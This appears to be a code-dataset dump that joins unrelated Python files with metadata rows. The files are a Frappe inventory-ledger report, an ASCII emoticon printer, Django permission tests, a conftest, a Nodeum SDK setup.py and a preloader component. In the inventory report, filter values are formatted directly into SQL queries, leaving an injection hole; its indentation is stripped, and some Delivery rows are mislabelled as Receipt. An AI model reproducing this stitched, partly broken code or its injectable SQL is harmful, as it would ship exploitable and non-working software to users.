] | null | null | null | inventory/inventory/report/inventory_ledger/inventory_ledger.py | riconova92/inventory | 7cc4f49bda31f802af36ee4ea6eb43092b5094a7 | [
"MIT"
] | null | null | null | # Copyright (c) 2013, Myme and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
def execute(filters=None):
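	"""Build Inventory Ledger rows (in/out roll quantities per item variant)
	from Packing List Receipt/Delivery, Stock Recon Inventory and Repack
	Inventory documents, optionally filtered by item and document number."""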
columns, data = [], []
columns = ["Item Code:Link/Item:100","Colour:Link/Colour:100","Yard/Meter:Float:100","Group:Data:100",
"In Qty:Float:100","Out Qty:Float:100","Document:Link/DocType:100","Document No:Dynamic Link/Document:100"]
item_clause = ""
if filters.get("item") :
item_clause = """ AND j.`item_code_variant` = "{0}" """.format(filters.get("item"))
document_no_clause = ""
if filters.get("document_no") :
document_no_clause = """ AND i.`name`="{0}" """.format(filters.get("document_no"))
data = []
if not filters.get("document") :
new_data = frappe.db.sql("""
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll`,0,
"Packing List Receipt",i.`name` FROM `tabPacking List Receipt`i JOIN `tabPacking List Receipt Data`j ON i.`name`=j.`parent`
WHERE i.`docstatus`=1
{0} {1}
ORDER BY j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`
""".format(document_no_clause,item_clause),as_list=1)
data = data + new_data
new_data = frappe.db.sql("""
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0,j.`total_roll`,
"Packing List Receipt",i.`name` FROM `tabPacking List Delivery`i JOIN `tabPacking List Delivery Data`j ON i.`name`=j.`parent`
WHERE i.`docstatus`=1
{0} {1}
ORDER BY j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`
""".format(document_no_clause,item_clause),as_list=1)
data = data + new_data
new_data = frappe.db.sql("""
SELECT * FROM
(
SELECT j.`item_code_roll`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll` AS `in_qty`, 0 AS `out_qty`,"Stock Recon Inventory" AS `document`,i.`name`
FROM `tabStock Recon Inventory`i JOIN `tabStock Recon Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 {0} {1}
UNION ALL
SELECT j.`item_code_roll`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0 AS `in_qty`, j.`total_roll` AS `out_qty`,"Stock Recon Inventory" AS `document`,i.`name`
FROM `tabStock Recon Inventory`i JOIN `tabStock Recon Inventory Item Out`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 {0} {1}
)d
ORDER BY d.`item_code_roll`,d.`colour`,d.`yard_atau_meter_per_roll`,d.`group`
""".format(document_no_clause,item_clause),as_list=1)
data = data + new_data
new_data = frappe.db.sql("""
SELECT * FROM
(
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll` AS `in_qty`,0 AS `out_qty`,"Repack Inventory",i.`name`
FROM `tabRepack Inventory`i JOIN `tabRepack Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 AND j.`status`="To" {0} {1}
UNION ALL
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0 AS `in_qty`,j.`total_roll` AS `out_qty`,"Repack Inventory",i.`name`
FROM `tabRepack Inventory`i JOIN `tabRepack Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 AND j.`status`="From" {0} {1}
)d
ORDER BY d.`item_code_variant`,d.`colour`,d.`yard_atau_meter_per_roll`,d.`group`
""".format(document_no_clause,item_clause),as_list=1)
data = data + new_data
elif filters.get("document") == "Packing List Receipt" :
data = frappe.db.sql("""
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll`,0,
"Packing List Receipt",i.`name` FROM `tabPacking List Receipt`i JOIN `tabPacking List Receipt Data`j ON i.`name`=j.`parent`
WHERE i.`docstatus`=1
{0} {1}
ORDER BY j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`
""".format(document_no_clause,item_clause),as_list=1)
elif filters.get("document") == "Packing List Delivery" :
data = frappe.db.sql("""
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0,j.`total_roll`,
"Packing List Receipt",i.`name` FROM `tabPacking List Delivery`i JOIN `tabPacking List Delivery Data`j ON i.`name`=j.`parent`
WHERE i.`docstatus`=1
{0} {1}
ORDER BY j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`
""".format(document_no_clause,item_clause),as_list=1)
elif filters.get("document") == "Stock Recon Inventory" :
data = frappe.db.sql("""
SELECT * FROM
(
SELECT j.`item_code_roll`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll` AS `in_qty`, 0 AS `out_qty`,"Stock Recon Inventory" AS `document`,i.`name`
FROM `tabStock Recon Inventory`i JOIN `tabStock Recon Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 {0} {1}
UNION ALL
SELECT j.`item_code_roll`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0 AS `in_qty`, j.`total_roll` AS `out_qty`,"Stock Recon Inventory" AS `document`,i.`name`
FROM `tabStock Recon Inventory`i JOIN `tabStock Recon Inventory Item Out`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 {0} {1}
)d
ORDER BY d.`item_code_roll`,d.`colour`,d.`yard_atau_meter_per_roll`,d.`group`
""".format(document_no_clause,item_clause),as_list=1)
elif filters.get("document") == "Repack Inventory" :
data = frappe.db.sql("""
SELECT * FROM
(
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll` AS `in_qty`,0 AS `out_qty`,"Repack Inventory",i.`name`
FROM `tabRepack Inventory`i JOIN `tabRepack Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 AND j.`status`="To" {0} {1}
UNION ALL
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0 AS `in_qty`,j.`total_roll` AS `out_qty`,"Repack Inventory",i.`name`
FROM `tabRepack Inventory`i JOIN `tabRepack Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 AND j.`status`="From" {0} {1}
)d
ORDER BY d.`item_code_variant`,d.`colour`,d.`yard_atau_meter_per_roll`,d.`group`
""".format(document_no_clause,item_clause),as_list=1)
return columns, data
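# A minimal sketch (hypothetical helper, not wired into execute() above) of
# building the same filters as bound parameters, so that frappe.db.sql escapes
# the values itself instead of having them formatted into the query string:
#   clauses, values = get_filter_clauses(filters)
#   frappe.db.sql(base_query.format(clauses), values, as_list=1)
def get_filter_clauses(filters):
    clauses, values = "", {}
    if filters.get("item"):
        clauses += " AND j.`item_code_variant` = %(item)s"
        values["item"] = filters.get("item")
    if filters.get("document_no"):
        clauses += " AND i.`name` = %(document_no)s"
        values["document_no"] = filters.get("document_no")
    return clauses, values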
| 51.621849 | 170 | 0.687937 | 1,021 | 6,143 | 3.940255 | 0.083252 | 0.031071 | 0.064628 | 0.079543 | 0.865026 | 0.865026 | 0.854089 | 0.854089 | 0.854089 | 0.854089 | 0 | 0.016236 | 0.137718 | 6,143 | 118 | 171 | 52.059322 | 0.743251 | 0.014488 | 0 | 0.757895 | 0 | 0.252632 | 0.786482 | 0.273674 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010526 | false | 0 | 0.021053 | 0 | 0.042105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
da4b0d7afa5f1f67a7c542580012e226da2f4368 | 5,381 | py | Python | emoticon.py | moontr3/emoticon | 698a0efccd5e6efe2dd2e2d8abc07a89d7f7d266 | [
"CC0-1.0"
] | 1 | 2022-03-28T09:51:06.000Z | 2022-03-28T09:51:06.000Z | emoticon.py | moontr3/emoticon | 698a0efccd5e6efe2dd2e2d8abc07a89d7f7d266 | [
"CC0-1.0"
] | null | null | null | emoticon.py | moontr3/emoticon | 698a0efccd5e6efe2dd2e2d8abc07a89d7f7d266 | [
"CC0-1.0"
] | null | null | null | """
###################################################
# #
# Made by moontr3, 2022. All rights reserved. #
# #
###################################################
_ _ _
| | | | _____ __ | |_ ___ _ _ ___ ___ _
| |_| |/ _ \ \ /\ / / | __/ _ \ | | | / __|/ _ (_)
| _ | (_) \ V V / | || (_) | | |_| \__ \ __/_
|_| |_|\___/ \_/\_/ \__\___/ \__,_|___/\___(_)
----------------------------------
emoticon.get_emoticon(text=str, is_sitting=bool, left_hand_up=bool, right_hand_up=bool, round_message=bool)
Return emoticon (string) with text <text>
emoticon.print_emoticon(text=str, is_sitting=bool, left_hand_up=bool, right_hand_up=bool, round_message=bool)
Print emoticon with text <text>
----------------------------------
==================================
----------------------------------
_____ _ _
| ____|_ ____ _ _ __ ___ _ __ | | ___ ___ ___ __| | ___ _
| _| \ \/ / _` | '_ ` _ \| '_ \| |/ _ \ / __/ _ \ / _` |/ _ (_)
| |___ > < (_| | | | | | | |_) | | __/ | (_| (_) | (_| | __/_
|_____/_/\_\__,_|_| |_| |_| .__/|_|\___| \___\___/ \__,_|\___(_)
|_|
----------------------------------
==================================
import emoticon
text = emoticon.get_emoticon("Hello world!")
----------------------------------
Putting emoticon with text "Hello world!" into the variable
----------------------------------
==================================
import emoticon
emoticon.print_emoticon("Hello world")
----------------------------------
Printing emoticon with text "Hello world"
----------------------------------
==================================
import emoticon
text = emoticon.get_emoticon("Hello world!", is_sitting=True)
print(text)
----------------------------------
Putting an emoticon that is sitting with text "Hello world!" into the variable and then printing it
"""
###################################################
def get_emoticon(text="How to use: get_emoticon(text=str, is_sitting=bool, left_hand_up=bool, right_hand_up=bool, round_message=bool)", is_sitting=False, left_hand_up=False, right_hand_up=False, round_message=True):
top_part = " O "
middle_part = "/|\ "
bottom_part = "/ \ "
if is_sitting == False:
pass
elif is_sitting == True:
bottom_part = "<-> "
else:
return "is_sitting isn't a boolean variable."
if left_hand_up == False and right_hand_up == False:
pass
elif left_hand_up == True and right_hand_up == False:
top_part = "\O "
middle_part = " |\ "
elif left_hand_up == False and right_hand_up == True:
top_part = " O/ "
middle_part = "/| "
elif left_hand_up == True and right_hand_up == True:
top_part = "\O/ "
middle_part = " | "
else:
return "left_hand_up and/or right_hand_up isn't a boolean variable(-s)."
if "\n" in text:
return "Text cannot be multiline."
if round_message == False:
message_outline = "=" * len(text)
text = f'''
{message_outline}
<{text}>
{message_outline}
/
{top_part}
{middle_part}
{bottom_part}
'''
elif round_message == True:
message_outline = "-" * (len(text)-1)
text = f'''
,{message_outline}-,
|{text}|
`v{message_outline}`
{top_part}
{middle_part}
{bottom_part}
'''
else:
return "round_message isn't a boolean variable."
return text
###################################################
def print_emoticon(text="How to use: print_emoticon(text=str, is_sitting=bool, left_hand_up=bool, right_hand_up=bool, round_message=bool)", is_sitting=False, left_hand_up=False, right_hand_up=False, round_message=True):
top_part = " O "
middle_part = "/|\ "
bottom_part = "/ \ "
if is_sitting == False:
pass
elif is_sitting == True:
bottom_part = "<-> "
else:
print("is_sitting isn't a boolean variable.")
if left_hand_up == False and right_hand_up == False:
pass
elif left_hand_up == True and right_hand_up == False:
top_part = "\O "
middle_part = " |\ "
elif left_hand_up == False and right_hand_up == True:
top_part = " O/ "
middle_part = "/| "
elif left_hand_up == True and right_hand_up == True:
top_part = "\O/ "
middle_part = " | "
else:
print("left_hand_up and/or right_hand_up isn't a boolean variable(-s).")
if "\n" in text:
print("Text cannot be multiline.")
if round_message == False:
message_outline = "=" * len(text)
text = f'''
{message_outline}
<{text}>
{message_outline}
/
{top_part}
{middle_part}
{bottom_part}
'''
elif round_message == True:
message_outline = "-" * (len(text)-1)
text = f'''
,{message_outline}-,
|{text}|
`v{message_outline}`
{top_part}
{middle_part}
{bottom_part}
'''
else:
print("round_message isn't a boolean variable.")
print(text)
###################################################
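# A small usage demo (runs only when the module is executed directly, e.g.
# `python emoticon.py`); it exercises the options documented in the module
# docstring above.
if __name__ == "__main__":
    print_emoticon("Hello world!")
    print_emoticon("Sitting down", is_sitting=True)
    print_emoticon("Both hands up!", left_hand_up=True, right_hand_up=True, round_message=False)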
| 29.729282 | 219 | 0.478721 | 524 | 5,381 | 4.335878 | 0.129771 | 0.084507 | 0.070423 | 0.049296 | 0.882482 | 0.864877 | 0.864877 | 0.822183 | 0.794894 | 0.794894 | 0 | 0.001792 | 0.273927 | 5,381 | 180 | 220 | 29.894444 | 0.579729 | 0.383386 | 0 | 0.857143 | 0 | 0.020408 | 0.373139 | 0.014571 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0.040816 | 0 | 0 | 0.071429 | 0.061224 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da5ad4a45aff6162f95f2d38873a0742bdba237e | 5,762 | py | Python | app/test/test_permissions.py | livra-ar/backend | eb052611bb9b2cfa360fa422ce059984b8d295fa | [
"BSD-2-Clause"
] | 1 | 2020-09-05T12:18:06.000Z | 2020-09-05T12:18:06.000Z | app/test/test_permissions.py | thamidurm/ar-content-platform-backend | eb052611bb9b2cfa360fa422ce059984b8d295fa | [
"BSD-2-Clause"
] | 3 | 2021-06-09T17:46:46.000Z | 2021-09-22T18:54:57.000Z | app/test/test_permissions.py | livra-ar/backend | eb052611bb9b2cfa360fa422ce059984b8d295fa | [
"BSD-2-Clause"
] | null | null | null | from unittest.mock import MagicMock
from app.permissions import IsOwnerOfBookOrReadOnly, IsOwnerOfContentOrReadOnly
from django.test import TestCase
from app.models import *
from rest_framework import permissions
class IsOwnerOfBookOrReadOnlyTest(TestCase):
def tearDown(cls):
mongoengine.get_connection().drop_database('testdb')
def setUp(self):
self.creator1 = Creator(
email='user2@example.com',
name='User',
password='password'
)
self.creator1.save()
self.creator2 = Creator(
email='user3@example.com',
name='User2',
password='password'
        )
        self.creator2.save()
self.book = Book(
title='Book Title #1',
authors=['Author #1'],
isbns=['111111111111'],
covers=['http://www.example.com/cover.png'],
publisher=self.creator1,
)
self.book.save()
self.view = MagicMock()
self.permission = IsOwnerOfBookOrReadOnly()
def test_has_object_permission_success_for_safe_methods(self):
obj = MagicMock(publisher=None)
for method in permissions.SAFE_METHODS:
            request = MagicMock(method=method, user=self.creator1)
self.assertTrue(self.permission.has_object_permission(request, self.view, obj))
def test_has_object_permission_success_for_unsafe_methods(self):
obj = MagicMock(publisher=self.creator1)
for method in ['POST', 'PUT', 'DELETE']:
            request = MagicMock(method=method, user=self.creator1)
self.assertTrue(self.permission.has_object_permission(request, self.view, obj))
def test_has_object_permission_failure_for_unsafe_methods(self):
obj = MagicMock(publisher=self.creator1)
for method in ['POST', 'PUT', 'DELETE']:
            request = MagicMock(method=method, user=self.creator2)
self.assertFalse(self.permission.has_object_permission(request, self.view, obj))
def test_has_permission_success_for_safe_methods(self):
for method in permissions.SAFE_METHODS:
            request = MagicMock(method=method, user=self.creator1)
self.assertTrue(self.permission.has_permission(request, self.view))
def test_has_permission_success_for_unsafe_methods(self):
for method in ['POST', 'PUT', 'DELETE']:
            request = MagicMock(method=method, user=self.creator1)
self.assertTrue(self.permission.has_permission(request, self.view))
def test_has_permission_failure_for_unsafe_methods(self):
for method in ['POST', 'PUT', 'DELETE']:
            request = MagicMock(method=method, user=self.creator2, data={
'id': self.book.id
})
self.assertFalse(self.permission.has_permission(request, self.view))
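# A minimal sketch (comments only, not part of the suite) of how the
# per-method loops in these tests could report each HTTP verb as a separate
# failure via unittest's subTest:
#
#     for method in ['POST', 'PUT', 'DELETE']:
#         with self.subTest(method=method):
#             request = MagicMock(method=method, user=self.creator1)
#             self.assertTrue(self.permission.has_permission(request, self.view))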
class IsOwnerOfContentOrReadOnlyTest(TestCase):
def tearDown(cls):
mongoengine.get_connection().drop_database('testdb')
def setUp(self):
self.creator1 = Creator(
email='user2@example.com',
name='User',
password='password'
)
self.creator1.save()
self.creator2 = Creator(
email='user3@example.com',
name='User2',
password='password'
        )
        self.creator2.save()
self.book = Book(
title='Book Title #1',
authors=['Author #1'],
isbns=['111111111111'],
covers=['http://www.example.com/cover.png'],
publisher=self.creator1,
)
self.book.save()
self.content = Content(
title="Content Title #1",
description="Content Description #1",
images=['https://www.example.com/image.png'],
creator=self.creator1,
book=self.book,
file='https://www.example.com/file.zip'
)
self.content.save()
self.view = MagicMock()
self.permission = IsOwnerOfContentOrReadOnly()
def test_has_object_permission_success_for_safe_methods(self):
obj = MagicMock(creator=None)
for method in permissions.SAFE_METHODS:
            request = MagicMock(method=method, user=self.creator1)
self.assertTrue(self.permission.has_object_permission(request, self.view, obj))
def test_has_object_permission_success_for_unsafe_methods(self):
obj = MagicMock(creator=self.creator1)
for method in ['POST', 'PUT', 'DELETE']:
            request = MagicMock(method=method, user=self.creator1)
self.assertTrue(self.permission.has_object_permission(request, self.view, obj))
def test_has_object_permission_failure_for_unsafe_methods(self):
obj = MagicMock(creator=self.creator1)
for method in ['POST', 'PUT', 'DELETE']:
            request = MagicMock(method=method, user=self.creator2)
self.assertFalse(self.permission.has_object_permission(request, self.view, obj))
def test_has_permission_success_for_safe_methods(self):
for method in permissions.SAFE_METHODS:
            request = MagicMock(method=method, user=self.creator1)
self.assertTrue(self.permission.has_permission(request, self.view))
def test_has_permission_success_for_unsafe_methods(self):
for method in ['POST', 'PUT', 'DELETE']:
            request = MagicMock(method=method, user=self.creator1)
self.assertTrue(self.permission.has_permission(request, self.view))
def test_has_permission_failure_for_unsafe_methods(self):
for method in ['POST', 'PUT', 'DELETE']:
            request = MagicMock(method=method, user=self.creator2, data={
'id': self.content.id
})
self.assertFalse(self.permission.has_permission(request, self.view)) | 38.413333 | 92 | 0.638667 | 629 | 5,762 | 5.683625 | 0.131955 | 0.063776 | 0.033566 | 0.083916 | 0.866573 | 0.862098 | 0.844755 | 0.844755 | 0.844755 | 0.844755 | 0 | 0.014046 | 0.246269 | 5,762 | 150 | 93 | 38.413333 | 0.809118 | 0 | 0 | 0.770492 | 0 | 0 | 0.08971 | 0 | 0 | 0 | 0 | 0 | 0.098361 | 1 | 0.131148 | false | 0.032787 | 0.040984 | 0 | 0.188525 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da602a6f8e67ebec4fd2556439f9720a07d8cbff | 148 | py | Python | tests/conftest.py | domibydzovsky/wagtail-rest-pack | 821d5d4111a4a7665e50272035e90f836a2c60c2 | [
"MIT"
] | null | null | null | tests/conftest.py | domibydzovsky/wagtail-rest-pack | 821d5d4111a4a7665e50272035e90f836a2c60c2 | [
"MIT"
] | null | null | null | tests/conftest.py | domibydzovsky/wagtail-rest-pack | 821d5d4111a4a7665e50272035e90f836a2c60c2 | [
"MIT"
] | null | null | null | from django.conf import settings, global_settings
from . import settings as mysettings
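# pytest_configure runs once after command-line parsing and before test
# collection, so Django settings are configured before any test module
# imports code that needs them.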
def pytest_configure():
settings.configure(mysettings)
| 21.142857 | 49 | 0.804054 | 18 | 148 | 6.5 | 0.611111 | 0.239316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135135 | 148 | 6 | 50 | 24.666667 | 0.914063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
da7ecb56a164d4da7e17297c99c105c7f5be1673 | 6,827 | py | Python | setup.py | nodeum-io/nodeum-sdk-python | 205536491bff507dea7be44af46202c17e7121d9 | [
"MIT"
] | null | null | null | setup.py | nodeum-io/nodeum-sdk-python | 205536491bff507dea7be44af46202c17e7121d9 | [
"MIT"
] | null | null | null | setup.py | nodeum-io/nodeum-sdk-python | 205536491bff507dea7be44af46202c17e7121d9 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Nodeum API
    The Nodeum API makes it easy to tap into the digital data mesh that runs across your organisation. Make requests to our API endpoints and we'll give you everything you need to interconnect your business workflows with your storage. All production API requests are made to: http://nodeumhostname/api/ The current production version of the API is v1. **REST** The Nodeum API is a RESTful API. This means that the API is designed to allow you to get, create, update, & delete objects with the HTTP verbs GET, POST, PUT, PATCH, & DELETE. **JSON** The Nodeum API speaks exclusively in JSON. This means that you should always set the Content-Type header to application/json to ensure that your requests are properly accepted and processed by the API. **Authentication** All API calls require user-password authentication. **Cross-Origin Resource Sharing** The Nodeum API supports CORS for communicating from Javascript for these endpoints. You will need to specify an Origin URI when creating your application to allow for CORS to be whitelisted for your domain. **Pagination** Some endpoints such as File Listing return a potentially lengthy array of objects. In order to keep the response sizes manageable the API will take advantage of pagination. Pagination is a mechanism for returning a subset of the results for a request and allowing for subsequent requests to "page" through the rest of the results until the end is reached. Paginated endpoints follow a standard interface that accepts two query parameters, limit and offset, and return a payload that follows a standard form. These parameter names and their behavior are borrowed from SQL LIMIT and OFFSET keywords. **Versioning** The Nodeum API is constantly being worked on to add features, make improvements, and fix bugs. This means that you should expect changes to be introduced and documented. However, there are some changes or additions that are considered backwards-compatible and your applications should be flexible enough to handle them. These include: - Adding new endpoints to the API - Adding new attributes to the response of an existing endpoint - Changing the order of attributes of responses (JSON by definition is an object of unordered key/value pairs) **Filter parameters** When browsing a list of items, multiple filter parameters may be applied. Some operators can be added to the value as a prefix: - `=` value is equal. Default operator, may be omitted - `!=` value is different - `>` greater than - `>=` greater than or equal - `<` lower than - `<=` lower than or equal - `><` included in list, items should be separated by `|` - `!><` not included in list, items should be separated by `|` - `~` pattern matching, may include `%` (any characters) and `_` (one character) - `!~` pattern not matching, may include `%` (any characters) and `_` (one character) # noqa: E501
The version of the OpenAPI document: 2.1.0
Contact: info@nodeum.io
Generated by: https://openapi-generator.tech
"""
from setuptools import setup, find_packages # noqa: H301
NAME = "nodeum-sdk"
VERSION = "1.88.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["urllib3 >= 1.15", "six >= 1.10", "certifi", "python-dateutil"]
setup(
name=NAME,
version=VERSION,
description="Nodeum API",
author="Nodeum",
author_email="info@nodeum.io",
url="",
keywords=["OpenAPI", "OpenAPI-Generator", "Nodeum API"],
install_requires=REQUIRES,
packages=find_packages(exclude=["test", "tests"]),
include_package_data=True,
long_description="""\
    The Nodeum API makes it easy to tap into the digital data mesh that runs across your organisation. Make requests to our API endpoints and we'll give you everything you need to interconnect your business workflows with your storage. All production API requests are made to: http://nodeumhostname/api/ The current production version of the API is v1. **REST** The Nodeum API is a RESTful API. This means that the API is designed to allow you to get, create, update, & delete objects with the HTTP verbs GET, POST, PUT, PATCH, & DELETE. **JSON** The Nodeum API speaks exclusively in JSON. This means that you should always set the Content-Type header to application/json to ensure that your requests are properly accepted and processed by the API. **Authentication** All API calls require user-password authentication. **Cross-Origin Resource Sharing** The Nodeum API supports CORS for communicating from Javascript for these endpoints. You will need to specify an Origin URI when creating your application to allow for CORS to be whitelisted for your domain. **Pagination** Some endpoints such as File Listing return a potentially lengthy array of objects. In order to keep the response sizes manageable the API will take advantage of pagination. Pagination is a mechanism for returning a subset of the results for a request and allowing for subsequent requests to "page" through the rest of the results until the end is reached. Paginated endpoints follow a standard interface that accepts two query parameters, limit and offset, and return a payload that follows a standard form. These parameter names and their behavior are borrowed from SQL LIMIT and OFFSET keywords. **Versioning** The Nodeum API is constantly being worked on to add features, make improvements, and fix bugs. This means that you should expect changes to be introduced and documented. However, there are some changes or additions that are considered backwards-compatible and your applications should be flexible enough to handle them. These include: - Adding new endpoints to the API - Adding new attributes to the response of an existing endpoint - Changing the order of attributes of responses (JSON by definition is an object of unordered key/value pairs) **Filter parameters** When browsing a list of items, multiple filter parameters may be applied. Some operators can be added to the value as a prefix: - `=` value is equal. Default operator, may be omitted - `!=` value is different - `>` greater than - `>=` greater than or equal - `<` lower than - `<=` lower than or equal - `><` included in list, items should be separated by `|` - `!><` not included in list, items should be separated by `|` - `~` pattern matching, may include `%` (any characters) and `_` (one character) - `!~` pattern not matching, may include `%` (any characters) and `_` (one character) # noqa: E501
"""
)
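# Illustrative only (kept as comments so nothing runs during installation):
# a minimal sketch of calling a paginated, filtered endpoint as described in
# the long description above. The host, credentials and endpoint path are
# placeholders/assumptions, not part of this package.
#
# import requests
# resp = requests.get(
#     "http://nodeumhostname/api/v1/files",            # hypothetical endpoint
#     params={"limit": 50, "offset": 0,                # pagination
#             "size": ">=1024", "name": "~%report%"},  # prefixed filter operators
#     headers={"Content-Type": "application/json"},
#     auth=("user", "password"),                       # user-password authentication
# )
# resp.raise_for_status()
# print(resp.json())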
| 162.547619 | 3,098 | 0.752014 | 1,039 | 6,827 | 4.930703 | 0.263715 | 0.022838 | 0.023424 | 0.010931 | 0.853211 | 0.838571 | 0.838571 | 0.838571 | 0.79797 | 0.789381 | 0 | 0.01657 | 0.169035 | 6,827 | 41 | 3,099 | 166.512195 | 0.88648 | 0.463307 | 0 | 0 | 0 | 0.052632 | 0.893359 | 0.017911 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.052632 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 10 |
16f8c3f97059b6dc834deb8f68b1e926295d72e8 | 3,584 | py | Python | phanterpwa/components/preloaders/android.py | PhanterJR/phanterpwa | 6daff40845b3a853cd08d319c4ce148f8deebed7 | [
"MIT"
] | 2 | 2019-06-06T10:37:01.000Z | 2021-10-16T03:36:28.000Z | phanterpwa/components/preloaders/android.py | PhanterJR/phanterpwa | 6daff40845b3a853cd08d319c4ce148f8deebed7 | [
"MIT"
] | null | null | null | phanterpwa/components/preloaders/android.py | PhanterJR/phanterpwa | 6daff40845b3a853cd08d319c4ce148f8deebed7 | [
"MIT"
] | null | null | null | import os
from ...helpers import DIV
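# PRELOADER builds a Material-style circular spinner: four "spinner-layer"
# blocks, each composed of two clipped half-circles ("circle_clipper" left
# and right) plus a "gap-patch"; the animation itself is defined in the
# accompanying android.sass.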
PRELOADER = DIV(
DIV(
DIV(
DIV(
DIV(
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper left'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_gap-patch'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper right'
),
_class='spinner-layer spinner-one'
),
DIV(
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper left'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_gap-patch'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper right'
),
_class='spinner-layer spinner-two'
),
DIV(
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper left'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_gap-patch'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper right'
),
_class='spinner-layer spinner-three'
),
DIV(
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper left'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_gap-patch'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper right'
),
_class='spinner-layer spinner-four'
),
_class='phanterpwa_android'
),
_class='preloader-wrapper enabled'
),
_class="preload-wrapper"),
_class="phanterpwa-components-preloaders-android"
)
PRELOADER.sass_file(
os.path.join(os.path.dirname(__file__), "android.sass")
)
PRELOADER.sass_vars = {
'STROKEWIDTH': '10px',
'CONTAINERWIDTH': '200px',
'COLOR1': 'blue',
'COLOR2': 'red',
'COLOR3': '#f4b400',
'COLOR4': 'green',
}
